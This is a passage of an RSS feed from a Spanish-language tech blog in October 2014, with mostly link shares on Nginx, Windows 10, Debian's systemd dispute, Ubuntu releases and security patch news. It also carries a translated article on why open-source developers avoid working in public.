      <guid>https://www.igalvan.es/posts/nginx-cumple-10-anos-con-un-crecimiento/</guid>
      <description><![CDATA[<p>El servidor <em>web</em> de código abierto <em>Nginx</em> (y balanceador de carga, servidor <em>proxy</em> inverso y servidor caché HTTP) cumple diez años durante este mes y su contraparte comercial, <em>Nginx Plus</em> está celebrando su primer cumpleaños al mismo tiempo. Para remarcar este momento, la empresa me proporcionó sus últimas estadísticas de usuarios y también tuve la oportunidad de conseguiralgunos comentarios de Gus Robertson, CEO de la compañía.</p>
<p>La empresa informa que durante los últimos doce meses, la adopción de <em>Nginx</em> creció un 54 por ciento, con una cuota de mercado del 41%entre los 10.000 sitios <em>web</em> más concurridos. Durante los últimos cuatro años, la adopción de <em>Nginx</em> creció un 400% en total. Estas son las impresionantes estadísticas, pero lo que es tal vez más importante para la compañía es que su servicio comercial ahora cuenta con 250 clientes de pago, un crecimiento del 164 por ciento en el tercer cuatrimestre en comparación con el anterior. Robertson dijo que la compañía está viendo el impulso a través de una amplia variedad de industrias, incluyendo los mercados de la educación, los medios y entretenimiento, el comercio electrónico minorista, la tecnología y las finanzas.</p>
<blockquote>
<p>&ldquo;Estas cuentas buscan normalmente ofrecer aplicaciones que funcionen como los sitios <em>web</em> de consumo a gran escala, pero sin los costos de desarrollo y de ingeniería de la construcción de encargo un nivel de entrega de aplicaciones&rdquo;,</p>
</blockquote>
<p>señaló Robertson.</p>
<p>También dijo que cuando la compañía lanzó su primer servicio comercial, el enfoque inicial se centró en las aplicaciones <em>web</em> a gran escala. Eso funcionó bien, pero Robertson dijo que la compañía se dio cuenta rápidamente de que</p>
<blockquote>
<p>&ldquo;muchas aplicaciones no tienen que escalar como las aplicaciones <em>web</em> de monstruos pero quieren ofrecer una gran experiencia de usuario con tiempos de respuesta muy rápidos, máximo tiempo de actividad y capacidad móvil completa&rdquo;.</p>
</blockquote>
<p>A modo de ejemplo, citó una aplicación bancaria para los clientes de alta poder adquisitivo: la aplicación no ve una gran cantidad de tráfico, pero todavía tiene que ofrecer tiempos de respuesta muy rápidos para el control de los saldos de cuenta y confirmaciones comerciales.</p>
<p>En cuanto al futuro de <em>Nginx</em>, Robertson dijo que una de las principales tendencias que está viendo es la funcionalidad de red a nivel de aplicación &ldquo;en movimiento inherente a la aplicación y lejos de la infraestructura subyacente y de la red.&rdquo;</p>
<blockquote>
<p>&ldquo;El advenimiento de entornos de nube, equipos de <em>devops</em> y de tecnología como los contenedores <em>Linux</em> nos están impulsando a la verdadera abstracción de la aplicación. Es hora de que la funcionalidad de la aplicación que se ha ligado a la red en el pasado sea abstraída&rdquo;, dijo.</p>
</blockquote>
<p>Mientras que los servidores <em>web</em> están en el centro de esta tendencia, el equilibrio de carga, el almacenamiento en caché, el <em>streaming</em> de medios de comunicación y la seguridad son también una parte importante de la entrega de aplicaciones. Como era de esperar, <em>Nginx</em> ofrece ya la mayor parte de esta funcionalidad.</p>
<p>Enlace original en inglés: <a href="http://techcrunch.com/2014/10/16/Nginx-turns-10-usage-up-400-in-the-last-4-years">http://techcrunch.com/2014/10/16/Nginx-turns-10-usage-up-400-in-the-last-4-years</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>OneGet, el gestor de paquetes estilo Linux que tendrá Windows 10</title>
      <link>https://www.igalvan.es/posts/oneget-el-gestor-de-paquetes-estilo/</link>
      <pubDate>Tue, 28 Oct 2014 12:06:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/oneget-el-gestor-de-paquetes-estilo/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muycomputer.com/2014/10/28/gestor-paquetes-windows-10">OneGet, el gestor de paquetes estilo Linux que tendrá Windows 10 » MuyComputer</a><br/><br/>    <blockquote class="link_og_blockquote">El nuevo sistema operativo de Microsoft, Windows 10, incluirá un gestor de paquetes al estilo Linux</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>¿Se pierde la garantía por instalar Linux? Una gran cadena de tecnología dice que sí</title>
      <link>https://www.igalvan.es/posts/se-pierde-la-garantia-por-instalar/</link>
      <pubDate>Mon, 27 Oct 2014 14:37:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/se-pierde-la-garantia-por-instalar/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.adslzone.net/2014/10/27/se-pierde-la-garantia-por-instalar-linux-una-gran-cadena-inglesa-dice-que-si/">¿Se pierde la garantía por instalar Linux? Una gran cadena de tecnología dice que sí</a><br/><br/>    <blockquote class="link_og_blockquote">La cadena británica Currys ha negado la garantía de compra de ordenadores de sobremesa a aquellos clientes que instalaron Linux en sus equipos</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>OneDrive delivers unlimited cloud storage to Office 365 subscribers | OneDrive Blog</title>
      <link>https://www.igalvan.es/posts/onedrive-delivers-unlimited-cloud/</link>
      <pubDate>Mon, 27 Oct 2014 14:35:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/onedrive-delivers-unlimited-cloud/</guid>
      <description><![CDATA[<p>Link: <a href="https://blog.onedrive.com/office-365-onedrive-unlimited-storage/">OneDrive delivers unlimited cloud storage to Office 365 subscribers | OneDrive Blog</a><br/><br/>    <blockquote class="link_og_blockquote">OneDrive is the one place for your files that you can access from virtually anywhere. Read our blog to hear the latest news and updates!</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Londres se llena de puntos de recarga para smartphones</title>
      <link>https://www.igalvan.es/posts/youtubehttpswww/</link>
      <pubDate>Mon, 27 Oct 2014 14:33:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/youtubehttpswww/</guid>
      <description><![CDATA[<p>[youtube=https://www.youtube.com/watch?v=QQbiedmqC9g]<br/>              <p><span data-reactid=".1.0">Londres va a llenar su mapa de puntos de recarga para <em>smartphones</em> denominados <em>Solar Box</em>, fundada por UnLtd, LSE Entrepreneurship y Siemens, cuya energía es solar a través de paneles y que incluye cuatro tomas. Estarán abiertas desde las 05:30 hasta las 11:30, 365 días al año. Y sí, serán gratuitas. La primera en Tottenham Court Road.</span></p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nueve lecciones sobre tecnología que nos ha enseñado (o no) &#39;The IT Crowd&#39;</title>
      <link>https://www.igalvan.es/posts/nueve-lecciones-sobre-tecnologia-que/</link>
      <pubDate>Sun, 26 Oct 2014 13:00:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/nueve-lecciones-sobre-tecnologia-que/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.xataka.com/otros/nueve-lecciones-sobre-tecnologia-que-nos-ha-ensenado-o-no-the-it-crowd">Nueve lecciones sobre tecnología que nos ha enseñado (o no) &lsquo;The IT Crowd&rsquo;</a><br/><br/>    <blockquote class="link_og_blockquote">Recopilación con las mejores escenas de ‘The IT Crowd’, una comedia inglesa sobre dos informáticos que sufren para dar soporte en una empresa…</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Drupal Fixes Highly Critical SQL Injection Flaw</title>
      <link>https://www.igalvan.es/posts/drupal-fixes-highly-critical-sql/</link>
      <pubDate>Sun, 26 Oct 2014 12:56:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/drupal-fixes-highly-critical-sql/</guid>
      <description><![CDATA[<p>Link: <a href="http://threatpost.com/drupal-fixes-highly-critical-sql-injection-flaw/108861">Drupal Fixes Highly Critical SQL Injection Flaw</a><br/><br/>    <blockquote class="link_og_blockquote">Drupal has patched a critical SQL injection vulnerability in version 7.x of the content management system that can allow arbitrary code execution.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Systemd pone contra las cuerdas a Debian, ¿posible fork a la vista?</title>
      <link>https://www.igalvan.es/posts/systemd-pone-contra-las-cuerdas-debian/</link>
      <pubDate>Fri, 24 Oct 2014 21:48:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/systemd-pone-contra-las-cuerdas-debian/</guid>
      <description><![CDATA[<p>El empeño que está poniendo la actual directiva de <em>Debian</em> en mantener <a href="http://es.wikipedia.org/wiki/Systemd"><em>systemd</em></a> como demonio de administración del sistema puede hacer que una de las comunidades más antiguas y estables del universo del software libre se tambalee y termine dividiéndose. Muy malas noticias para aquellos que usamos <a href="https://www.debian.org/index.es.html"><em>Debian</em></a> como nuestra distribución principal.</p>
<p>Este conflicto empezó hace ya unos meses como un conato abortado sobre todo cuando desde <em>Canonical</em> se decidió acatar la decisión adoptada desde <em>Debian</em>, pero en estos últimos tiempos una coalición de desarrolladores, administradores y usuarios capitaneados por <a href="http://es.wikipedia.org/wiki/Ian_Jackson">Ian Jackson</a> que propugnan por volver a <a href="http://en.wikipedia.org/wiki/Init"><em>sysvinit</em></a>, está tomando fuerza bajo el lema “<em>hacer una cosa y hacerla bien</em>“.</p>
<p>Estaremos atentos a lo que pase a partir de ahora y esperamos que se puede llegar a un consenso beneficioso para todas las partes.</p>
<p>Enlace: <a href="http://blog.desdelinux.net/systemd-vs-inteligencia/">http://blog.desdelinux.net/systemd-vs-inteligencia/</a></p>
<p>Enlace: <a href="http://debianfork.org/">http://debianfork.org/</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ubuntu 14.10 Utopic Unicorn ya disponible</title>
      <link>https://www.igalvan.es/posts/ubuntu-1410-utopic-unicorn-ya-disponible/</link>
      <pubDate>Fri, 24 Oct 2014 21:47:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ubuntu-1410-utopic-unicorn-ya-disponible/</guid>
      <description><![CDATA[<p><em>Ubuntu</em> cumple diez años y para celebrarlo publica la versión 14.10 de su distribución, <em>Utopic Unicorn</em>.</p>
<p>Enlace:
<a href="https://wiki.ubuntu.com/UtopicUnicorn/ReleaseNotes">https://wiki.ubuntu.com/UtopicUnicorn/ReleaseNotes</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Roll up your sleeves, we may need to fork Debian.</title>
      <link>https://www.igalvan.es/posts/roll-up-your-sleeves-we-may-need-to/</link>
      <pubDate>Thu, 23 Oct 2014 14:22:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/roll-up-your-sleeves-we-may-need-to/</guid>
      <description><![CDATA[<p>Link: <a href="http://debianfork.org/">Roll up your sleeves, we may need to fork Debian.</a><br/><br/>    <blockquote class="link_og_blockquote">A website made by Veteran Unix Admins to organize and protest against the decision to impose SystemD to Debian users.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ubuntu 14.10 &#39;Utopic Unicorn&#39;, disponible - MuyLinux</title>
      <link>https://www.igalvan.es/posts/ubuntu-1410-unicorn-disponible-muylinux/</link>
      <pubDate>Thu, 23 Oct 2014 14:14:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ubuntu-1410-unicorn-disponible-muylinux/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muylinux.com/2014/10/23/ubuntu-14-10-utopic-unicorn">Ubuntu 14.10 &lsquo;Utopic Unicorn&rsquo;, disponible - MuyLinux</a><br/><br/>    <blockquote class="link_og_blockquote">Ubuntu 14.10 ‘Utopic Unicorn’ y familia ya está disponible.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Microsoft alerta de nueva vulnerabilidad &#39;día cero</title>
      <link>https://www.igalvan.es/posts/microsoft-alerta-de-nueva/</link>
      <pubDate>Thu, 23 Oct 2014 13:19:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/microsoft-alerta-de-nueva/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muycomputer.com/2014/10/22/microsoft-vulnerabilidad-dia-cero">Microsoft alerta de nueva vulnerabilidad &ldquo;día cero&rdquo;</a><br/><br/>    <blockquote class="link_og_blockquote">En su blog oficial Microsoft alerta de una nueva vulnerabilidad tipo “zero day” (“día cero”) que afecta a todos los sistemas operativos.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>El experimento con un gato que ha revolucionado Internet (y que puedes hacer en casa)</title>
      <link>https://www.igalvan.es/posts/el-experimento-con-un-gato-que-ha/</link>
      <pubDate>Thu, 23 Oct 2014 00:07:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/el-experimento-con-un-gato-que-ha/</guid>
      <description><![CDATA[<p>Link: <a href="https://es.noticias.yahoo.com/el-experimento-con-un-gato-que-ha-revolucionado-internet--y-que-puedes-hacer-en-casa-105806786.html">El experimento con un gato que ha revolucionado Internet (y que puedes hacer en casa)</a><br/><br/>    <blockquote class="link_og_blockquote">A esta limitadísima base de conocimientos se ha sumado una nueva certeza que se ha descubierto esta semana. Los gatos se sienten irremediablemente atraídos por el espacio delimitado.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Ventajas de utilizar software libre en la educación</title>
      <link>https://www.igalvan.es/posts/ventajas-de-utilizar-software-libre-en/</link>
      <pubDate>Tue, 21 Oct 2014 13:21:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ventajas-de-utilizar-software-libre-en/</guid>
      <description><![CDATA[<p>Link: <a href="http://bitelia.com/2014/10/ventajas-utilizar-software-libre-educacion">Ventajas de utilizar software libre en la educación</a><br/><br/>    <blockquote class="link_og_blockquote">El software libre en la educación ofrece ventajas para ampliar las posibilidades de aprendizaje de tus alumnos en el salón de clases.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nginx Turns 10, Usage Up 400% In The Last 4 Years | TechCrunch</title>
      <link>https://www.igalvan.es/posts/nginx-turns-10-usage-up-400-in-last-4/</link>
      <pubDate>Sat, 18 Oct 2014 00:48:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/nginx-turns-10-usage-up-400-in-last-4/</guid>
      <description><![CDATA[<p>Link: <a href="http://techcrunch.com/2014/10/16/nginx-turns-10-usage-up-400-in-the-last-4-years/">NGINX Turns 10, Usage Up 400% In The Last 4 Years | TechCrunch</a><br/><br/>    <blockquote class="link_og_blockquote">The open source NGINX web server (and load balancer, HTTP cache and reverse proxy server) is turning 10 this month and its commercial counterpart, NGINX Plus..</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Mozilla lanza su servicio de videoconferencia Firefox Hello</title>
      <link>https://www.igalvan.es/posts/mozilla-lanza-su-servicio-de/</link>
      <pubDate>Fri, 17 Oct 2014 23:36:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/mozilla-lanza-su-servicio-de/</guid>
      <description><![CDATA[<p>Link: <a href="http://libuntu.com/mozilla-lanza-su-servicio-de-videoconferencia-firefox-hello/">Mozilla lanza su servicio de videoconferencia Firefox Hello</a><br/><br/>    <blockquote class="link_og_blockquote">Mozilla ha anunciado su servicio de vídeo conferencia y chat “Firefox Hello” el cuál ofrecerá opciones similares a la ofrecida por Skype pero con la diferencia de que será ejecutado directamente de…</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>GitHub Student Developer Pack</title>
      <link>https://www.igalvan.es/posts/github-student-developer-pack/</link>
      <pubDate>Tue, 14 Oct 2014 13:11:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/github-student-developer-pack/</guid>
      <description><![CDATA[<p>Link: <a href="https://education.github.com/pack">GitHub Student Developer Pack</a><br/><br/>    <blockquote class="link_og_blockquote">The best developer tools, free for students. Get your GitHub Student Developer Pack now.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Scientific Linux 7.0 Release Notes</title>
      <link>https://www.igalvan.es/posts/scientific-linux-70-release-notes/</link>
      <pubDate>Tue, 14 Oct 2014 13:09:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/scientific-linux-70-release-notes/</guid>
      <description><![CDATA[<p>Link: <a href="http://ftp.scientificlinux.org/linux/scientific/7/x86_64/release-notes/">Scientific Linux 7.0 Release Notes</a><br/><br/>    <p><span data-reactid=".0.0">Se ha hecho esperar pero finalmente está aquí la versión final de <strong>Scientific Linux 7</strong>, clon a nivel binario de <a href="http://www.muylinux.com/2014/06/10/red-hat-enterprise-linux-7" title="Red Hat Enterprise Linux 7 ha sido liberado" target="_blank">Red Hat Enterprise Linux 7</a> (RHEL 7) con una marcada deriva científica, como su nombre adelanta.</span></p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Tu coche hablará con mi coche y será el mayor paso en seguridad en años</title>
      <link>https://www.igalvan.es/posts/tu-coche-hablara-con-mi-coche-y-sera-el/</link>
      <pubDate>Tue, 14 Oct 2014 13:02:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/tu-coche-hablara-con-mi-coche-y-sera-el/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.xataka.com/tecnologia-en-el-coche/tu-coche-hablara-con-mi-coche-y-sera-el-mayor-paso-en-seguridad-en-anos">Tu coche hablará con mi coche y será el mayor paso en seguridad en años</a><br/><br/>    <blockquote class="link_og_blockquote">Te explicamos que son los sistemas Vehicle To Vehicle o Car To Car, cómo funcionan y qué ventajas de seguridad aportan a la conducción de…</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Nostalgia: Así era la informática en los 80 y 90 | Emezeta</title>
      <link>https://www.igalvan.es/posts/nostalgia-asi-era-la-informatica-en-los/</link>
      <pubDate>Mon, 13 Oct 2014 13:47:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/nostalgia-asi-era-la-informatica-en-los/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.emezeta.com/articulos/informatica-en-los-80-90">Nostalgia: Así era la informática en los 80 y 90 | Emezeta</a><br/><br/>    <blockquote class="link_og_blockquote">¿Recuerdas los nostálgicos tiempos del MS-DOS? ¿Los precios del hardware? ¿Los diskettes? ¿Los virus? ¿El PC Speaker? Vamos a dar una vuelta al pasado.</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Con TinyScreen te puedes montar la consola portátil más pequeña del mundo</title>
      <link>https://www.igalvan.es/posts/con-tinyscreen-te-puedes-montar-la/</link>
      <pubDate>Mon, 13 Oct 2014 13:42:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/con-tinyscreen-te-puedes-montar-la/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.xataka.com/pantallas/con-tinyscreen-te-puedes-montar-la-consola-portatil-mas-pequena-del-mundo">Con TinyScreen te puedes montar la consola portátil más pequeña del mundo</a><br/><br/>    <blockquote class="link_og_blockquote">Normalmente nos paramos a hablar sobre pantallas, bastante sobre las que son grandes, y en mayor medida sobre las que tienen nuestros dispositivos…</blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Juegos indie a saco en itch.io - MuyLinux</title>
      <link>https://www.igalvan.es/posts/juegos-indie-saco-en-itchio-muylinux/</link>
      <pubDate>Mon, 13 Oct 2014 13:24:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/juegos-indie-saco-en-itchio-muylinux/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muylinux.com/2014/10/10/itch-io-juegos-indie">Juegos indie a saco en itch.io - MuyLinux</a><br/><br/>    <blockquote class="link_og_blockquote"><br/><div>Descubre itch.io, todo un templo para los desarrolladores indie con más de 500 juegos totalmente gratuitos para Linux.</div><br/></blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Anonabox, la caja para navegar por Internet de forma totalmente anónima</title>
      <link>https://www.igalvan.es/posts/anonabox-la-caja-para-navegar-por/</link>
      <pubDate>Mon, 13 Oct 2014 13:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/anonabox-la-caja-para-navegar-por/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.adslzone.net/2014/10/13/anonabox-la-caja-que-protegera-aun-mas-el-anonimato-en-la-red-tor/">Anonabox, la caja para navegar por Internet de forma totalmente anónima</a><br/><br/>    <p>Un nuevo proyecto <em>crowdfunding</em> bautizado como <em>Anonabox</em> permitirá pasar todas las conexiones de datos de nuestro equipo informático a través de <em> Tor</em>, mejorando la privacidad y el anonimato incluso al usar aplicaciones de mensajería o correo electrónico. El dispositivo tiene un precio de 45 dólares.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>6 razones por las que la gente no trabaja abiertamente</title>
      <link>https://www.igalvan.es/posts/6-razones-por-las-que-la-gente-no/</link>
      <pubDate>Mon, 06 Oct 2014 21:42:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/6-razones-por-las-que-la-gente-no/</guid>
      <description><![CDATA[<h2 id="qué-le-impide-trabajar-abiertamente">¿Qué le impide trabajar abiertamente?</h2>
<p>Trabajo para una empresa de código abierto en un proyecto de código abierto y todavía me encuentro a diario que las personas que están trabajando en el software de código abierto prefieren trabajar en privado (de vez en cuando). No discuten cuestiones técnicas sobre las listas de correo públicas, la conversación normal, se hace en las salas de chat internas en lugar del IRC público, y las nuevas características son más bien demostradas en canales de vídeoconferencia privadas como por ejemplo, Hangout on Air.
Por supuesto, hay buenas razones por las que la comunicación tiene que ser en privado: si los clientes o los datos de los clientes están involucrados, entonces (sobre todo para una empresa pública) se necesitan conversaciones privadas. De forma similar para las cifras de ventas u otros aspectos financieros. Aunque la realidad  es que los ingenieros la mayoría de las veces no hablan sobre cifras de ventas. Y la mayoría de los casos de los clientes son sólo problemas de softwaregenerales que se pueden discutir abiertamente mientas que no se mencione el nombre del cliente. Lo que me lleva a la pregunta de por qué las personas no están colaborando abiertamente, sobre todo cuando el código fuente resultante se publique en un repositorio público como GitHub.</p>
<h2 id="el-miedo-a-la-fuga">El miedo a la fuga</h2>
<p>Cuando se trabaja con los clientes, siempre hay grupos como la atención al cliente que no pueden trabajar abiertamente, lo que significa que no se unen a los canales de IRC públicos, sino a privados para mantener los datos de los clientes en privado. Los ingenieros que trabajan en este tipo de casos de clientes siempre pueden tener un miedo latente a que al discutir los detalles del caso puedan filtrarse datos de los clientes y los debates sobre ellos siempre suceden en los canales internos, no importa si cualquier cuestión específica del cliente se discute o no. Lo que me lleva al siguiente punto.</p>
<h2 id="el-esfuerzo-de-selección-y-conmutación">El esfuerzo de selección y conmutación</h2>
<p>Cuando se trabaja en los canales internos con datos relacionados con los clientes (y porque los respectivos colegas sólo están disponibles de esa manera), uno tiene que pensar y decidir si un determinado mensaje puede ir a los canales públicos o no constantemente. Uno puede entender que este tipo de comentarios de casos se realizan en los canales internos y para conseguir un flujo coherente de pensamiento se debe permanecer en el canal interno. Las conversaciones sobre otros temas no relacionados con los clientes deben, al contrario, ir a los canales públicos, lo que significa cambiar de canal todo el tiempo. Dicha selección y conmutación de canales sin duda es un esfuerzo que la gente trata de evitar.</p>
<h2 id="incertidumbre">Incertidumbre</h2>
<p>También puede haber casos en los que los ingenieros están trabajando en una solicitud de función o un fallo (bug) de un cliente que no es específico de cualquier cliente en absoluto. Y todavía hay una incertidumbre persistente sobre si el trabajo puede ser discutido abiertamente o no. Así que en caso de duda la discusión ocurre nuevamente en privado.</p>
<h2 id="el-miedo-a-la-distracción">El miedo a la distracción</h2>
<p>Mientras que la contribución comunitaria es (se dice que es) siempre bienvenidas, también puede ser visto como una fuente de distracción. Un miembro central de un proyecto posiblemente tenga que interrumpir su trabajo, empezar a pensar en el punto de vista del miembro de la comunidad, y luego volver al trabajo anterior. Esto puede ser de vez en cuando una distracción, especialmente cuando se tienen algunos lanzamientos programados (time boxed releases), por lo que esto puede no ser bienvenido.</p>
<h2 id="la-percepción-de-falta-de-beneficio">La percepción de falta de beneficio</h2>
<p>Nuestro proyecto tiene una parte bastante pequeña de la comunidad, lo que puede plantear la pregunta ¿por qué discutir las cosas en público si nadie parece interesado? ¿Por qué pasar a través de todos los aros anteriores? ¿Un árbol realmente cae en el bosque si no hay un observador?</p>
<h2 id="la-falta-de-confianza-en-sí-mismo">La falta de confianza en sí mismo</h2>
<p>Otra posible razón puede ser un miedo a la rendición de cuentas y la trazabilidad. Esto puede sonar gracioso en un primer momento dado que el código fuente termina en el repositorio público. La causa subyacente aquí puede ser una falta de confianza en uno mismo. Las discusiones en público que se registran como registros de chat, los vídeos de demostraciones de funciones, o las entradas de una bitácora permiten que otros den retroalimentación crítica y puede hacer que la persona se sienta insegura.
Yo soy un firme creyente de que el trabajo en el abierto es bueno. Incluso con una pequeña comunidad. Hacer el trabajo abiertamente permite obtener el aporte de los miembros de la comunidad, lo que enriquece el conocimiento del dominio del problema. Otros dan una perspectiva totalmente diferente y, probablemente, indiquen casos de uso en los que nunca ha pensado. Además, si los miembros de la comunidad se incluyen en la comunidad en general, se sienten mejor y empezar a contribuir más. Para obtener ideas sobre cómo contribuir en formas distintas de código, vea el artículo: <a href="https://opensource.com/life/13/10/ten-ways-open-source-projects">10 maneras de contribuir a un proyecto de código abierto sin necesidad de escribir código</a>.</p>
<p>Mis encuentros con miembros de la comunidad han sido muy buenos, como todo el mundo es muy amable y reunirse con miembros de la comunidad en persona es siempre divertido. Entonces, ¿qué podemos hacer para superar los obstáculos que he enumerado anteriormente?</p>
<ul>
<li>En primer lugar, establecer una política sobre que toda comunicación tiene que estar en los canales públicos de forma predeterminada a menos que existan buenas razones en contra.</li>
<li>Recuérdese a sí mismo comenzar el día en los canales públicos. Cuando se se empieza allí, se establece una especie de defecto para uno mismo. Y anima a otros a charlar allí también, por lo que la construcción de una masa crítica para conseguir que las conversaciones continúen.</li>
<li>Recuerde a la gente de vez en cuando acerca de la política anterior.</li>
<li>Disocie la información del cliente de la información técnica tan pronto como sea posible. Tal vez directamente en el nivel de la persona de soporte. Un NullPointerException es un NPE no importa si es reportado por un cliente que paga o por un miembro de la comunidad.</li>
<li>Registre los canales públicos para que los miembros de la comunidad tengan la posibilidad de volver a leer lo que se discutió.</li>
<li>Si tiene que trabajar en silencio, entonces no deje fuera únicamente a la comunidad externa. Interrumpa las comunicaciones externas, haga su trabajo y luego regrese – la distracción es una distracción, no importa si proviene de otra persona de la comunidad o de un compañero de trabajo.</li>
<li>Si se siente incómodo escribiendo (por ejemplo, una entrada de bitácora que explica su trabajo o una nueva característica) primero pásasela a otra persona de tu confianza. A menos que usted ni siquiera intente ofrecer un buen resultado, no hay mensajes malos. La mejor comunidad siempre agradece cualquier información adicional.</li>
</ul>
<p>Traducido del original en inglés: <a href="http://opensource.com/business/14/10/why-work-open">http://opensource.com/business/14/10/why-work-open</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>HP to Separate Into Two New Industry-Leading Public Companies - NASDAQ.com</title>
      <link>https://www.igalvan.es/posts/hp-to-separate-into-two-new-industry/</link>
      <pubDate>Mon, 06 Oct 2014 13:40:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/hp-to-separate-into-two-new-industry/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.nasdaq.com/press-release/hp-to-separate-into-two-new-industryleading-public-companies-20141006-00109">HP to Separate Into Two New Industry-Leading Public Companies - NASDAQ.com</a><br/><br/>    <blockquote class="link_og_blockquote">Hewlett-Packard Enterprise Will Define the Next Generation of Technology Infrastructure, Software and Services for the New Style of IT HP Inc. Will.</blockquote><br/><p>HP se separa oficialmente en dos empresas,  una <em>HP Inc.</em> dedicada a PCs e impresoras, y otra, llamada <em>HP Enterprise</em> dedicada a empresas y servicios.</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Google planning to launch own mobile messaging app similar to WhatsApp</title>
      <link>https://www.igalvan.es/posts/google-planning-to-launch-own-mobile/</link>
      <pubDate>Mon, 06 Oct 2014 13:25:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/google-planning-to-launch-own-mobile/</guid>
      <description><![CDATA[<p>Link: <a href="http://economictimes.indiatimes.com/tech/internet/google-planning-to-launch-own-mobile-messaging-app-similar-to-whatsapp/articleshow/44141070.cms">Google planning to launch own mobile messaging app similar to WhatsApp</a><br/><br/>    <p><em>Google</em> contra <em>Facebook</em> por la supremacía en la mensajería instantánea, ¿será capaz esta vez de batir a la bestia?</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La privacidad vuelve a ser protagonista ante unos preocupantes términos de uso en Windows 10 TP</title>
      <link>https://www.igalvan.es/posts/la-privacidad-vuelve-ser-protagonista/</link>
      <pubDate>Mon, 06 Oct 2014 13:21:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-privacidad-vuelve-ser-protagonista/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.xataka.com/aplicaciones-y-servicios/la-privacidad-vuelve-a-ser-protagonista-ante-unos-preocupantes-terminos-de-uso-en-windows-10-tp">La privacidad vuelve a ser protagonista ante unos preocupantes términos de uso en Windows 10 TP</a><br/><br/>    <p>A <em>Microsoft</em> se le ha ido la mano con los términos de uso de la <em>Technical Preview</em> de <em>Windows</em> 10. Solo falta que le demos las llaves de casa. Muy mal por <em>Microsoft</em> :-(</p></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Impresionante diorama de DOOM recreado con Legos</title>
      <link>https://www.igalvan.es/posts/impresionante-diorama-de-doom-recreado/</link>
      <pubDate>Sat, 04 Oct 2014 01:17:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/impresionante-diorama-de-doom-recreado/</guid>
      <description><![CDATA[<p>Link: <a href="http://www.muycomputer.com/2014/10/01/diorama-de-doom-legos">Impresionante diorama de DOOM recreado con Legos</a><br/><br/>    <blockquote class="link_og_blockquote"><br/><div>Iain Heath es el autor de este cuidado y preciosista diorama de DOOM recreado con Legos que, francamente, raya a un gran nivel.</div><br/></blockquote></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Las grandes compañías de refrescos acuerdan reducir el azúcar de sus bebidas</title>
      <link>https://www.igalvan.es/posts/las-grandes-companias-de-refrescos/</link>
      <pubDate>Thu, 02 Oct 2014 14:25:00 +0100</pubDate>
      
